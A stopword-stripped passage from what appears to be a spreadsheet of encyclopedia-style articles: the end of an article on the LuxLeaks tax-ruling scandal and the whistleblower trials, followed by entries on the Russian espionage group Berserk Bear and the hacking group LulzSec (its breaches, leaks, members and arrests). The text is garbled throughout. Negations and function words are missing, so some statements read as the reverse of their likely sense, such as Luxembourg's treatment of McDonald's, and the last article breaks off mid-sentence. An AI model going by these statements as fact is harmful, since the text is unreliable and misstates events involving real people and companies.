secret information), imply known connection them. luxembourgish regime illuminated luxleaks revelations shed light luxembourgish regime, highly beneficial multinational companies. foreign corporations started settling luxembourg large numbers early 1990s, luxembourg transposed national directive allowed companies taxes european headquarters country subsidiaries operated.tax rulings large accounting firms (the "big four") benefits clients, multinational companies, approved luxembourgish administration. rulings include schemes transfer revenues luxembourg. transfer pricing mechanisms used multinational corporations reallocate profits. intragroup loans another possible mechanism: company based high-tax country makes loan interest rate subsidiary luxembourg. interest rate reflects credit rating company group, example subsidiary luxembourg typically purpose loaning money high interest rates, example back another subsidiary outside luxembourg. since regime luxembourg tailored advantageous financial multinational companies, profits generated taxed rates. such mechanisms effective means erode bases countries high rates shift profits countries less taxed (see also base erosion profit shifting).in many cases companies' presence luxembourg symbolic. instance, 1,600 companies registered address guillaume kroll luxembourg. rulings legality question legality rulings question. even exist many european countries, rulings tend become considered state aids able distort competition. european commission directorate-general competition launched several investigations last years. october 2015, european commission concluded deals favour fiat finance trade luxembourg starbucks netherlands illegal state aid. during press conference, european commission competition commissioner margrethe vestager confirmed: used information coming luxleaks market information [...] whistleblower also plays important role here."following luxleaks revelations, several investigations launched multinational companies. between 2015 2018, mcdonald's company subject investigation launched european commission directorate-general competition. looked system licenses paid european subsidiaries mcdonald's luxembourg branch. more billion euros loss european states 2009 2013 would stake. september 2018, european commission concluded luxembourg breach rules regards treatment mcdonald's. mcdonald's wait investigations' conclusions announces december 2016 moving branch luxembourg united kingdom. investigations also opened amazon 2014, gdf-suez (now engie) 2016 ikea 2017 schemes luxembourg. january 2016, european commission concluded preferential system established since 2005 belgium illegal. consequently, thirty-five large multinational companies benefited illegal system reimburse shortfall estimated least million euros. luxleaks impacts when revealed, luxleaks impact public opinion particularly high, front line controversial role jean-claude juncker, president european commission newly appointed days luxleaks revelations. juncker luxembourg's prime minister time many country's tax-avoidance rules enacted. luxembourg's finance minister, pierre gramegna, described leak "the worst attack" country ever experienced. luxleaks raised discussion avoidance luxembourg countries. follow european parliament following luxleaks scandal, anti-eu groups european parliament, including independence party france's national front, proposed motion censure european commission's team j.c. juncker president. november 2014, vote european parliament rejecting motion censure, mainstream political groups supported jean-claude juncker.on february 2015, european parliament special committee rulings european union member states. committee composed members initially months report findings. this special committee preferred committee inquiry would implied higher power inquiry. this choice considered parliamentarians political willingness embarrass jean-claude juncker. context investigations, special committee requested information commission member states, commissioned research briefings, held public hearings committee's delegations visited several countries europe. committee faced multinational corporations' unwillingness testimony. october 2015, committee published mandate report several recommendations: country-by-country reporting multinationals' activities; introducing common consolidated corporate base (cctb) europe; including european commission rulings automatic information sharing; better protection whistleblowers. november 2015, report approved european parliament plenary session vote.the special committee european parliament reactivated june 2016. reactivation committee follows press' disclosure documents, demonstrates countries within european commission obstructive years regarding reform systems allowing aggressive avoidance. special committee includes members initial committee. aims following deepening previous investigations rulings policies european union states. follow european commission first action european commission level transparency package commissioner pierre moscovici presented march 2015. mainly consisted setting system automatic exchange information advance ruling member states' administrations. non-governmental organizations (ngo) members european parliament (mep) consider measures insufficient public release rulings expected. technical document accompanying transparency package considers luxleaks major motive commission's decision corporate avoidance. that's anti federalist politicians fear european commission luxleaks push harmonisation.in october 2015, european finance ministers evaluated system automatic exchange information rulings member states administrations, leaving however european commission public general outside information exchange. automatic exchange information advance ruling member states' administrations effective since january 2017. european commission made second move june 2015 presenting "action plan fair efficient corporate taxation eu". introducing action plan, commissioner pierre moscovici said "corporate taxation needs radical reform [and] everyone must fair share". action plan fairer taxation proposes re-launch common consolidated corporate base, four years previous attempt member states' opposition. also proposes several measures order reach effective taxation companies countries profits made. commission also published list havens among non-eu member states. ngos expressed doubts action plan would successfully eradicate multinational companies' profit shifting underlined lack willingness acting quickly subject.the european commission released january 2016 action plan, including anti-tax avoidance measures automatic exchange information related multinationals' activities. however, order enacted, plan unanimously approved member states european union. action plan already assessed justice ngos weak measure counteract avoidance.on april 2016, european commission presented plan tackle corporate dodging. european parliament's study estimates countries lose billion billion revenue every year, corporate income avoidance.in 2016, european member states came agreement fighting main optimization tools used companies within europe adopted first anti-tax avoidance directive (atad). however, final political agreement could reached inclusion exemptions increased implementation time length, expected weaken effects deal. spring 2017, complementary anti-tax avoidance directive (atad adopted fight differences treatment among firms third countries’ laws. started applicable member states january 2020.in october 2016, european commission proposed create common consolidated corporate base companies operating follow g-20 measures combat minimization discussed leaders attending 2014 g-20 brisbane summit included g-20 leaders' final communiqué: taking actions ensure fairness international system secure countries' revenue bases. profits taxed economic activities deriving profits performed value created."in november 2015, 2015 g-20 antalya summit adopted action plan released oecd early october. base erosion profit shifting plan includes list measures. ngos fear plan sufficient multinationals avoidance. follow luxembourg luxleaks revelations stress fact rulings priori legal secret luxembourg. numerous european member states sign rulings states), european statistics show 2014, luxembourg european country highest number ongoing 'sweetheart deals'. after luxleaks revelations, rulings kept agreed luxembourg. luxembourgish administration indicated rulings signed 2014 2015. content rulings remains secret: neither name benefiting companies rates obtained known.in 2016, press articles reported luxembourg started propose multinationals verbal rulings instead written ones, order keep secret. luxembourg denied information.in december 2016, luxembourg government shows good changes rules companies, making difficult multinationals avoid paying taxes international structure. however, january 2017, guardian publishes revelations showing luxembourg continues obstructing reforms efforts brussels, case jean-claude juncker grand-duchy prime minister.in luxembourg, luxleaks revelations often considered national trauma stigma made country, perceived abroad "tied banking secrecy". following luxleaks, luxembourg government nation branding policy improve image country. nevertheless, trial whistleblowers journalist involved disclosure leaks, luxembourg continued perceived judicial haven. follow-up regards whistleblower’s protection whistleblower's protection discussion linked luxleaks revelations, legal suits origin leaks luxleaks revelations. whistleblowers prosecuted luxembourg progressively become symbolise lack whistleblowers’ protection 2016, margrethe vestager, commissioner competition, said: think everyone thank whistleblower investigative journalists work this" contributing changing debate corporate taxation europe. 2016, lack whistleblowers’ protection became even salient directive reinforcing trade secrets adopted. despite exceptions foreseen journalists whistleblowers, directive appears additional legal instrument companies especially large groups order control information available them. april 2018, european commission published directive proposal whistleblowers’ protection. luxleaks case presented, among others, example damage general interest revealed whistleblowers. commission proposal, foresees broad protection whistleblowers, received positively ngos mobilised issue. this directive adopted spring 2019, jean-claude juncker's commission's mandate. directive transposed national member state december 2021 latest. follow accountancy advisory firms schemes enable multinationals achieve aggressive optimisation complex. they often specialised companies firms large international accounting financial audit firms pwc, deloitte kpmg (the so-called "big four"). luxleaks scandal highlighted role intermediaries. december 2014, british parliamentary public accounts committee interviewed kevin nicholson (head division second time years. margaret hodge, chairwoman committee, accused nicholson lied first hearing luxleaks. said: "it's hard understand anything mass-marketed avoidance scheme," think three ways lied think selling avoidance industrial scale." nicholson denied mass-marketed avoidance schemes.on february 2015, public accounts committee published report "tax avoidance: role large accountancy firms". commenting report, margaret hodge, chairwoman committee, says pwc's activities represent "nothing short promotion avoidance industrial scale". during investigation, committee heard british subsidiary large companies benefited rulings.in 2018, european directive (named dac6) adopted, aiming regulate intermediaries’ activities. intermediaries required declare national authorities cross-border schemes designed avoidance. reporting obligation comes force july 2020, applies older schemes. imposes mandatory exchange information member states matter, quarterly basis.law firms deny encourage evasion argue schemes provided multinationals legal. following luxleaks, luxembourg firms lost optimisation activities. contrary, seen increasing number clients interested avoidance practices. despite role multinational companies avoidance, intermediaries firms consulted european commission preparing european rules. this dual activity, source multiple institutionalised conflicts interest, shown corporate europe observatory (ngo) july 2018. luxleaks whistleblowers trial according international consortium investigative journalists (icij), files used luxleaks revelations come employees former employees luxembourgish subsidiaries international accounting firms: pwc, deloitte kpmg (the "big four"). between december 2014 april 2015, three people indicted luxembourg connection luxleaks revelations. multinational corporation faces charges country international level, legality rulings. antoine deltour, main leak source december 2014, luxembourg prosecutor's office announced investigating judge charged someone theft, disclosing confidential information trade secrets, money laundering fraud, following complaint filed 2012 former employee. december 2014, antoine deltour 28-year-old frenchman identified said motivation public good financial motivation. stated files copied protected hack system. said contact icij disclosed luxleaks documents attempt hide doing. copied files thought "this type data could document ruling practice, widely unknown, especially terms scale."support young french whistleblower progressively grew. december 2014, politicians, academics, union heads charity leaders around world signed guardian open letter opposition decision luxembourg prosecute antoine deltour. march 2015, french newspaper libération released op-ed article signed multiple french international signatories including edward snowden, thomas piketty joly. support committee antoine deltour public petition 212,000 signatures november 2016. june 2015, antoine deltour awarded european citizens' prize european parliament, prize annually awarding europeans contributing promotion european citizenship mutual cultural understanding. september 2015, antoine deltour jointly nominated, together whistleblowers stéphanie gibaud edward snowden 2015 sakharov prize freedom thought. december 2015, antoine deltour recognized "person year 2015" notes international professional magazine, influential role played shaping international law. other leak sources names companies benefited rulings revealed december 2014 ("luxleaks 2"). these names show leaks originated also accountancy firms based luxembourg. january 2015, raphaël halet, another former pricewaterhousecoopers employee charged similar accusations antoine deltour, following leak returns companies. this employee fired leak. identity kept secret trial began, halet signed secret agreement forcing silence.on april 2015, journalist edouard perrin indicted luxembourg co-author accomplice offences committed former employee charged january. journalist organizations consider judicial decision attempt press freedom. luxleaks trial following pricewaterhousecoopers' complaint, trial three people involved disclosure secret agreements held april 2016 criminal court luxembourg, eight half-day hearings, instead five initially scheduled. prosecutor lawyers plaintiff (pricewaterhousecoopers) emphasized disclosure secret documents delinquency. according lawyers former employees audit firm, antoine deltour raphael halet acted motivation defending general interest. during hearings, antoine deltour raphael halet emphasized role whistleblowers disclosing multinational companies' aggressive planning practices, immoral extremely detrimental common good. journalist edouard perrin's lawyers argued acted professionally sponsor leaks. trial, prosecutor requested 18-month jail sentence whistleblowers (possibly fully conditional sentence), well fines journalist specified amount). pricewaterhousecoopers' lawyers asked defendant's conviction euro damages. defense lawyers pleaded acquittal clients, basis freedom expression interpreted european court human rights. judgment delivered june 2016. antoine deltour sentenced suspended 12-month jail time 1,500 fine. raphaël halet sentenced suspended 9-month jail time 1,000 fine. edouard perrin, journalist first released revelations, acquitted. media coverage luxleaks trial high, symbolic current difficulties faced whistleblowers insufficient protection europe. 2016 adopted rules companies' trade secrets; meantime, project directive general whistleblowers' protection ahead. trial also raised issue practices legitimacy revealed luxleaks case. faced unfairness trial, defendants found many supporters trial front luxembourg court. appeal july 2016, antoine deltour raphaël halet decided appeal respective sentences. late july, prosecutor luxembourg also appealed verdict, order ensure full trial avoid truncating case. acquittal journalist edouard perrin subject review.before appeal trial began, meps signed open letter addressed whistleblowers express [their] support solidarity [the whistleblowers] light ongoing judicial proceedings [them] luxembourg. [they] salute courage past years tenacity trying overturn june verdict." several meps took part citizen european mobilisation, bringing together several hundred people front courthouse luxembourg opening appeal trial. appeal trial took place luxembourg december 2016 january 2017 included five half-day hearings. appeal trial mainly focused contradictory arguments european court human rights' criteria used recognize someone whistleblower. criteria fulfilled according deltour halet's lawyers, challenged prosecutor plaintiff. halet's defense also argued illegality, time facts, luxembourg authorities policies regarding rulings. indictment, prosecutor required reduced sentences, compared sentences delivered first instance. also requested journalist edouard perrin's acquittal. defense pleaded acquittal three defendants. both antoine deltour's raphaël halet's sentences reduced result respective appeals. deltour given 6-month suspended prison sentence charged 1500 euro fine halet given 1000 euro fine. journalist edouard perrin acquitted. even received reduced sentences, deltour halet decided appeal luxembourg court cassation. appeal higher court single hearing held november 2017 luxembourg court cassation. january 2018, court rendered distinct judgment defendants. court recalled whistleblower's action appreciated whole. consequently, overturned previous verdict deltour. following three years judicial procedures, deltour fully granted whistleblower status. luxembourg court cassation dismissed appeal halet. halet decided refer case european court human rights (echr) order recognition also acted whistleblower. 2021, echr rejected halet's appeal. also football leaks global integrity offshore financial centre offshore leaks panama papers, 2016 suisse secrets, 2022 swiss leaks, 2014 whistleblower references external links international consortium investigative journalists luxembourg leaks: global companies' secrets exposed guardian luxembourg files: tiny state rubber-stamped avoidance industrial scale. (including videos visits luxembourg.) politico, luxleaks file luxemburger wort (english edition), luxleaks file euractiv (english edition), luxleaks file irish times, luxleaks file support antoine deltour, luxleaks whistleblower support site</t>
  </si>
  <si>
    <t>Berserk Bear</t>
  </si>
  <si>
    <t>berserk bear (aka crouching yeti, dragonfly, dragonfly 2.0, dymalloy, energetic bear, havex, iron liberty, koala, teamspy) russian cyber espionage group, sometimes known advanced persistent threat. according united states, group composed "fsb hackers," either directly employed russian civilian, criminal hackers coerced contracting hackers still freelancing moonlighting criminal hackers. four accused berserk bear participants, three staff civilian, indicted united states regarded united states department justice fugitives. activities berserk bear specializes compromising utilities infrastructure, especially belonging companies responsible water energy distribution. performed activities least germany u.s. these operations targeted towards surveillance technical reconnaissance.berserk bear also targeted many state, local, tribal government aviation networks u.s., october 2020, exfiltrated data least victim servers. particular, berserk bear believed infiltrated computer network city austin, texas, 2020.the group capable producing advanced malware, although sometimes seeks mimic hacking groups conceal activities. indictments unsealed 2022 2021 federal grand juries united states indicted three personnel russian federal security service (fsb) civilian central research institute chemistry mechanics (cniihm). these indictments kept seal march 2022 united states publicly named defendants treated fugitives. evgeny gladkikh evgeny gladkikh (russian: евгений гладких): accused targeting network-connected safety equipment intent gain capability sabotage them. indicted u.s. district court district columbia "center defendants indictment case united states akulov, focused members team within "center (russian: 16-й центр) component also known military unit 71330 (russian: bойсковая часть 71330). british foreign office states full name center "radio-electronic intelligence means communication" (tsrrss); russian: центр радиоэлектронной разведки средствах связи (цppcc)the u.s. akulov case filed within united states district court district kansas. named defendants are: pavel aleksandrovich akulov (russian: павел александрович акулов, july 1985) described military officer assigned military unit 71330, held rank lieutenant 2013. akulov described conducting surveillance reconnaissance supporting targeting wolf creek generating station computer network. mikhail mikhailovich gavrilov (russian: михаил михайлович гаврилов, november 1979) described russian military intelligence officer assigned military unit 71330. held rank captain major. described conducting computer intrusions computer networks wolf creek another unnamed entity ("company used access energy, utility critical infrastructure webmail login webpages. marat valeryevich tyukov (russian: марат валерьевич тюков, november 1982) described russian military intelligence officer assigned military unit 71330. alleged gained unauthorized access server owned unnamed entity ("company one") used command control infrastructure. also accused tampering updates industrial control software affected power energy companies globally. department state designation u.s. state department rewards justice program offering million tips leading lead apprehension four named "berserk bear" suspects. also 2020 united states federal government data breach cozy bear fancy bear references</t>
  </si>
  <si>
    <t>LulzSec</t>
  </si>
  <si>
    <t>lulz security, commonly abbreviated lulzsec, black computer hacking group claimed responsibility several high profile attacks, including compromise user accounts playstation network 2011. group also claimed responsibility taking website offline. some security professionals commented lulzsec drawn attention insecure systems dangers password reuse. gained attention high profile targets sarcastic messages posted aftermath attacks. founders lulzsec computer security specialist hector monsegur, used online moniker sabu. later helped enforcement track members organization part plea deal. least four associates lulzsec arrested march 2012 part investigation. prior, british authorities announced arrests teenagers alleged lulzsec members, going pseudonyms t-flow topiary. midnight (bst, ut+01) june 2011, lulzsec released days lulz" statement, claimed final release, confirming lulzsec consisted members, website shut down. sudden disbandment group unexpected. their final release included accounts passwords many different sources. despite claims retirement, group committed another hack newspapers owned news corporation july, defacing false reports regarding death rupert murdoch. group also helped launch operation antisec, joint effort involving lulzsec, anonymous, hackers. background history federal indictment members contends that, prior forming hacking collective known lulzsec, members part another collective called internet feds, group rivalry anonymous. under name, group attacked websites belonging fine gael, hbgary, broadcasting company. this includes alleged incident e-mail messages stolen hbgary accounts. 2011, following publicity surrounding hbgary hacks, members internet feds founded group lulzsec.the group's first recorded attack fox.com's website, though still using name internet feds time. claimed responsibility leaking information, including passwords, altering several employees' linkedin profiles, leaking database factor contestants containing contact information 73,000 contestants. they claimed rapper common referred "vile" air.lulzsec drew name neologism "lulz", (from lol), "laughing loud", represents laughter, "sec", short "security". wall street journal characterized attacks closer internet pranks serious cyber-warfare, group claimed possess capability stronger attacks. gained attention part brazen claims responsibility lighthearted taunting corporations hacked. frequently referred internet memes defacing websites. group emerged 2011, successfully attacked websites several major corporations. specialized finding websites poor security, stealing posting information online. used well-known straightforward methods, injection, attack target websites. several media sources described tactics grey hacking. members group involved previous attack security firm hbgary.the group used motto "laughing security since 2011!" website, created june 2011, played theme love boat. announced exploits twitter website, often accompanied lighthearted ascii drawings boats. website also included bitcoin donation link help fund activities. paul world wrote that, name suggests, lulzsec claims interested mocking embarrassing companies exposing security flaws rather stealing data criminal purposes." group also critical white hackers, claiming many corrupted employers.some security community contended group raised awareness widespread lack effective security hackers. they credited inspiring lulzraft, group implicated several high-profile website hacks canada.in june 2011 group took suggestions sites denial-of-service attacks. group redirected telephone numbers different customer support lines, including line world warcraft, magnets.com, detroit office. group claimed sent five calls second sources, overwhelming support officers. june 2011, guardian released leaked logs group's chats, revealing core group small group hackers leader sabu exercised large control group's activities. also revealed group connections anonymous, though formally affiliated some lulzsec members prominent anonymous members, including member topiary.at midnight (utc) june 2011, lulzsec released days lulz" statement, claimed final release, confirming lulzsec consisted members, website taken down. group claimed planned active fifty days beginning. "we're quitting we're afraid enforcement. press getting bored we're getting bored us," group member said interview associated press. members group reported joined anonymous members continue antisec operation. however, despite claiming retire, group remained communication attacked websites british newspapers times july, leaving false story death owner rupert murdoch. former members associates lulzsec consisted seven core members. online handles seven established various attempts hacking groups release personal information group members internet, leaked logs published guardian, confirmation group itself. sabu group's founders, seemed kind leader group, sabu would often decide targets attack next could participate attacks. part anonymous group hacked hbgary. various attempts release real identity claimed information technology consultant strongest hacking skills group knowledge python programming language. thought sabu involved media outrage cast 2010 using skype "anonymous.sabu" sabu arrested june 2011 identified 29-year-old unemployed york’s lower east side. august, pleaded guilty several hacking charges agreed cooperate fbi. over following seven months successfully unmasked members group. sabu identified backtrace security hector montsegur march 2011 publication named "namshub." topiary topiary also suspected former member anonymous, used perform media relations, including hacking website westboro baptist church live interview. topiary lulzsec twitter account daily basis; following announcement lulzsec's dissolution, deleted posts twitter page, except one, stated: "you cannot arrest idea". police arrested shetland, united kingdom suspected topiary july 2011. later identified jake davis charged five counts, including unauthorized access computer conspiracy. indicted conspiracy charges march 2012. kayla/kms ryan ackroyd london, another unidentified individual known "lol" "shock.ofgod" lulzsec chat logs. kayla owned botnet used group distributed denial-of-service attacks. botnet reported consisted 800,000 infected computer servers. kayla involved several high-profile attacks group "gn0sis". kayla also participated anonymous operation hbgary. kayla reportedly wiretapped agents anonymous operation. kayla also involved 2010 media outrage skype handle "pastorhoudaille". kayla suspected something deputy sabu found vulnerabilities allowed lulzsec access united states senate systems. behind handle kayla identified ryan ackroyd london, arrested, indicted conspiracy charges march 2012. tflow (real name: mustafa al-bassam) fourth founding member group identified chat logs, attempts identify labelled coder, developer, performer scams paypal. group placed charge maintenance security group's website lulzsecurity.com. london metropolitan police announced arrest 16-year-old hacker going handle tflow july 2011. avunit core seven members group, founding member. left group self-labelled "fuck friday". also affiliated anonymous anonops avunit core seven members identified. pwnsauce pwnsauce joined group around time avunit became core members. identified darren martyn ireland indicted conspiracy charges march 2012. irish national worked local chapter leader open application security project, resigning week arrest. palladium identified donncha o'cearbhaill ireland, indicted conspiracy march 2012. anarchaos identified jeremy hammond chicago, arrested access device fraud hacking charges. also charged hacking attack u.s. security company stratfor december 2011. said member anonymous. ryan cleary, sometimes used handle viral. cleary faced sentence months relation attacks force others. ideology lulzsec appear hack financial profit, claiming main motivation causing mayhem. they things "for lulz" focused possible comedic entertainment value attacking targets. group occasionally claimed political message. when hacked pbs, stated retaliation perceived unfair treatment wikileaks frontline documentary entitled wikisecrets. page inserted website included title "free bradley manning. fuck frontline!" june announcement "operation anti-security" contained justification attacks government targets, citing supposed government efforts "dominate control internet ocean" accusing corruption breaching privacy. news media often described grey hackers.karim hijazi, security company unveillance, accused group blackmailing offering attack company affiliates exchange money. lulzsec responded claiming hijazi offered attack business opponents never intended take money him. lulzsec denied responsibility misuse data breached released. instead, placed blame users reused passwords multiple websites companies inadequate security place.in june 2011, group released manifesto outlining performed hacks website takedowns, reiterating things find entertaining" watching results "priceless". they also claimed drawing attention computer security flaws holes. they contended many hackers exploit steal user information without releasing names publicly telling people possibly hacked. lulzsec said releasing lists hacked usernames informing public vulnerable websites, gave users opportunity change names passwords elsewhere might otherwise exploited, businesses would alarmed would upgrade security.the group's later attacks political tone. they claimed want expose "racist corrupt nature" military enforcement. they also expressed opposition drugs. lulzsec's operation anti-security characterized protest government censorship monitoring internet. question answer session newsnight, lulzsec member whirlpool (aka: topiary) said, "politically motivated ethical hacking fulfilling". claimed loosening copyright laws rollback sees corrupt racial profiling practices group's goals. initial targets group's first attacks came 2011. their first recorded target fox.com, retaliated called common, rapper entertainer, "vile" news channel. they leaked several passwords, linkedin profiles, names 73,000 factor contestants. soon may, released transaction logs 3,100 automated teller machines united kingdom. 2011, members lulz security gained international attention hacking american public broadcasting system (pbs) website. they stole user data posted fake story site claimed tupac shakur biggie smalls still alive living zealand. aftermath attack, referred responsible group "lulz boat".lulz security claimed hacks, including attack pbs, motivated desire defend wikileaks chelsea manning. news report group quoted commentator, brandon pike, claimed lulz security affiliated hacktivist group anonymous. lulz security claimed pike actually hired hack pbs. pike denied accusation claimed leveled said lulz security splinter anonymous.in june 2011, members group claimed responsibility attack sony pictures took data included "names, passwords, e-mail addresses, home addresses dates birth thousands people." group claimed used injection attack, motivated sony's legal action george hotz jailbreaking playstation group claimed would launch attack would "beginning end" sony. some compromised user information subsequently used scams. group claimed compromised 1,000,000 accounts, though sony claimed real number around 37,500. corporate attacks lulz security attempted hack nintendo, group nintendo report particularly valuable information found hackers. lulzsec claimed mean harm nintendo, declaring: "we're targeting nintendo. like much sincerely hope nintendo plugs gap."on june, reports emerged lulzsec hacked stole user information pornography website www.pron.com. they obtained published around 26,000 e-mail addresses passwords. among information stolen records users subscribed using email addresses associated malaysian government, three users subscribed using united states military email addresses users lulzsec claimed administrators adult-oriented websites. following breach, facebook locked accounts users used published e-mail addresses, also blocked facebook accounts opened using leaked e-mail addresses, fearing users site would hacked lulzsec encouraged people people used identical user name password combinations facebook well.lulzsec hacked bethesda game studios network posted information taken network onto internet, though refrained publishing 200,000 compromised accounts. lulzsec posted twitter regarding attack, "bethesda, broke site months ago. we've brink users weeks, please junk, thanks!"on june 2011, lulzsec took four websites request fans part "titanic take-down tuesday". these websites minecraft, league legends, escapist, security company finfisher. they also attacked login servers massively multiplayer online game online, also disabled game's front-facing website, league legends login servers. most takedowns performed distributed denial-of-service attacks. june, lulzsec took main server games' heroes newerth another phone request. they claimed, "heroes newerth master login server down. they need treatment. also, dota better."on june, lulzsec posted random assortment 62,000 emails passwords mediafire. lulzsec stated released return supporters flooding 4chan board. group websites combinations encouraged followers plug various sites gained access account. some reported gaining access facebook accounts changing images sexual content others using amazon.com accounts others purchase several books. writerspace.com, literary website, later admitted addresses passwords came users site. government-focused activities lulzsec claimed hacked local infragard chapter sites, non-profit organization affiliated fbi. group leaked infragard member e-mails database local users. group defaced website posting following message, "let flow stupid battleships", accompanied video. lulzsec posted: come unfortunate attention nato good friend barrack osama-llama 24th-century obama [sic] recently upped stakes regard hacking. they treat hacking war. hacked affiliated website (infragard, specifically atlanta chapter) leaked user base. also took complete control site defaced it[.] june, lulzsec sent email administrators british national health service, informing security vulnerability discovered systems. lulzsec stated intend exploit vulnerability, saying email mean harm want help tech issues."on june, lulzsec released e-mails passwords number users senate.gov, website united states senate. information released also included root directory parts website. lulzsec stated, "this small, just-for-kicks release internal data senate.gov war, gentlemen? problem?" referencing recent statement pentagon cyberattacks could considered war. highly sensitive information appears release.on june, lulzsec launched attack cia.gov, public website united states central intelligence agency, taking website offline distributed denial-of-service attack. website 5:48 8:00 eastern time.on december, offshoot lulzsec calling lulzsec portugal, attacked several sites related government portugal. websites bank portugal, assembly republic, ministry economy, innovation development became unavailable hours. operation anti-security june, group announced teamed anonymous "operation anti-security". they encouraged supporters steal publish classified government information source leaving term "antisec" evidence intrusion. also listed potential targets major banks. today characterized operation open declaration cyberwarfare government corporations. their first target operation serious organised crime agency (soca), national enforcement agency united kingdom. lulzsec claimed taken website offline june 2011, though remained minutes. while attack appeared ddos attack, lulzsec tweeted actual hacking taking place "behind scenes". 6:10 june, soca's website went again. soca's website back online sometime june. website local district government jianhua district qiqihar, china, also knocked offline. early morning june, revealed lulzsec's "brazilian unit" taken brazilian government websites, brasil.gov.br presidencia.gov.br. they also brought website brazilian energy company petrobras.on june, members "lulz boat" reportedly leaked logs lulzsec going leak june. they also claimed leaked information aided authorities locating arresting ryan cleary, loosely affiliated group. lulzsec posted various personal information pastebin including addresses physical addresses. both involved cyber-crimes past, involved hacking game deus ex.after lulzsec encouragement, began tagging public locations physical graffiti reading "antisec" part operation. numerous beachfronts mission beach, diego vandalized phrase. some local news organizations mistook graffiti mission beach signs antisec movement. many commenters local news websites corrected this.on june, lulzsec released number documents pertaining arizona department public safety, titled "chinga migra", roughly translates "fuck border patrol". leaked items included email addresses passwords, well hundreds documents marked "sensitive" "for official only". lulzsec claimed protest passed arizona requiring aliens carry registration documents times. arizona officials confirmed intrusion. arizona police complained release officer identities method used combat gangs could endanger lives police officers.on june 2011, lulzsecbrazil published claimed access codes passwords used access petrobras website employee profile data taken using information. petrobras denied data stolen, lulzsecbrazil removed information twitter feed hours later. group also released personal information regarding president brazil dilma rousseff mayor paulo gilberto kassab.on june 2011, lulzsec released described last data dump. release contained enormous amount information various sources. files contained half gigabyte internal information telecommunication company at&amp;t, including information relating release details pertaining 90,000 personal phones used ibm. addresses several large corporations including sony, viacom, disney, emi, universal included. also contained 750,000 username password combinations several websites, including 200,000 email addresses, usernames, encrypted passwords hackforums.net; 12,000 names, usernames, passwords nato online bookshop; half million usernames encrypted passwords players online game battlefield heroes; 50,000 usernames, email addresses, encrypted passwords various video game forum users; users priority investigations, irish private investigation company. also included internal manual engineering staff screencapture vandalized page navy.mil, website united states navy. members group continued operation members anonymous disbanding.despite claiming retired, july lulzsec hacked website british newspaper sun. group redirected newspaper's website also-hacked redesign website another newspaper times, altering site resemble posting fake story claiming rupert murdoch died ingesting fatal dose palladium. they objected involvement news corporation, murdoch-owned company publishes times, large phone hacking scandal. hacked website also contained webcomic depicting lulzsec deciding carrying attack. group later redirected website twitter feed. news international released statement regarding attacks page statement appeared also redirected lulzsec twitter page eventually taken offline. group also released names phone numbers reporter others associated newspaper encouraged supporters call them. recent times novacygni antisec openly touted news channel russian television (rt) openly stated support anonymous movement least reporter active member anonymous. they included email address password former news international executive rebekah brooks. news corporation took websites offline precaution later day. denied attacks media reported number attacks, originally attributed lulzsec, group later denied involvement june, someone claiming group posted pastebin stolen entire database united kingdom census 2011. lulzsec responded saying obtained data whoever posted notice group. british officials said investigating incident, found evidence databases compromised information taken. british government, upon concluding investigation, called claims information census taken hoax.in june 2011, assets belonging newspaper publisher news international attacked, apparently retaliation reporting arrest ryan cleary, associate group. newspaper's website computer used publishing process times attacked. however, lulzsec denied involvement, stating attack times kind ddos attack". members antisec based essex england claimed responsibility attack. hacker actions lulzsec number different hackers targeted lulzsec members response activities. june 2011, news reported rival hacker group teamp0ison responsible outing designer sven slootweg, said used online nickname joepie91, intentions every member. pastebin post june 2011 hacker killercube identified lulzsec leader sabu hector xavier monsegur, identification later shown accurate.a group calling team ninjas appeared june 2011 saying angry lulzsec release e-mail addresses passwords thousands normal internet users. they attempted publicly identify online real world identities lulzsec leadership claimed behalf group's victims. group claimed identified given enforcement names number group's members, including someone claimed united states marine.the jester, hacker generally went leetspeak handle th3j35t3r, vowed find expose members lulzsec. claiming perform hacks sense american patriotism, attempted obtain publish real world personally identifiable information members, described "childish". june 2011, claimed revealed identity lulzsec leader sabu information technology consultant possibly york city. june 2011, hacker allegedly going name oneiroi briefly took lulzsec website labelled "operation supernova". twitter page group also briefly became unavailable.on june 2011, guardian published leaked logs group's channels. logs originally assumed leaked disillusioned former member group went nickname m_nerva, fellow hacker michael major, known handle 'hann', later claimed responsibility. after confirming leaked logs indeed theirs, logs revealed personal information members recently left group implications attacking website, lulzsec went threaten m_nerva twitter feed. lulzsec claimed logs core chatting channels, rather secondary channel used screen potential backups gather research.a short time lulzsec claimed disbanding, group calling a-team posted claimed full list lulzsec members online along numerous chat logs group communicating other. rival hacker going name trick also claimed working reveal group's identities claimed efforts part rival hackers pushed group disband fear caught. enforcement response june 2011, london metropolitan police announced arrested 19-year-old wickford, essex, named lulzsec locally ryan cleary, part operation carried cooperation fbi. suspect arrested charges computer misuse fraud, later charged five counts computer hacking criminal computer misuse act. news reports described alleged member lulzsec. lulzsec denied arrested member. member lulzsec claimed suspect part group, host channels server. british police confirmed questioned regarding alleged involvement lulzsec attacks serious organized crime agency (soca) targets. they also questioned regarding attack international federation phonographic industry november 2010. june 2011 court released cleary bail conditions leave house without mother device connected internet. diagnosed previous week asperger syndrome. june 2012 cleary, together another suspected lulzsec member, 19-year-old jake davis, pleaded guilty conspiring attack government, enforcement media websites 2011.at around time cleary's arrest, federal bureau investigation agents raided reston, virginia facility swiss hosting service digitalone. raid took several legitimate websites offline hours agency looked information undisclosed target. media reports speculated raid related lulzsec investigation.a days lulzsec disbanded, executed search warrant iowa home rented laurelai bailey. authorities interviewed five hours confiscated hard drives, camera, electronic equipment, charges filed. bailey denied member group, admitted chatting members lulzsec online later leaking chats. interested infiltrate group, bailey claimed members hated would never questioning local technical support company fire laurelai, claiming embarrassed company.on june 2011, executed another search warrant hamilton, ohio. local media connected raid lulzsec investigation; however, warrant sealed, name target revealed, office cincinnati refused comment possible connection group raid. charged crime served warrant. some reports suggested house belonged former lulzsec member m_nerva, originally suspected leaking number group's logs press, information leading warrant supplied ryan cleary.on july 2011, london metropolitan police announced arrest lulzsec member tflow. 16-year-old male arrested south london charges violating computer misuse act, part operation involving arrest several hackers affiliated anonymous united states united kingdom. lulzsec denied membership arrested, stating "there seven we're still here."on arrested 21-year-old lance moore cruces, mexico, accusing stealing thousands documents applications at&amp;t lulzsec published part called "final release".the police central e-crime unit arrested 18-year-old shetland july 2011 suspected lulzsec member topiary. they also searched house 17-year-old lincolnshire possibly connected investigation, interviewing him. scotland yard later identified arrested yell, shetland resident jake davis. charged unauthorized access computer computer misuse 1990, encouraging assisting criminal activity serious crime 2007, conspiracy 